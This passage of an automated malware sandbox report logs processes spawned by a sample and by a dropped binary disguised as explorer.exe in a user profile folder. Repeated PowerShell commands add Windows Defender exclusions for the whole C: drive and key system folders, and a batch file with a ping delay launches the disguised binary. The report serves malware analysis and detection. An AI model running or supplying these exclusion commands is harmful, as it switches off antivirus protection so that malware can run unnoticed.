                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'Jump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'Jump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'Jump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'Jump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qWYjuUdv6Q.bat" Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe "C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe"
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeQueries volume information: C:\Users\user\Desktop\CPNSQusnwC.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
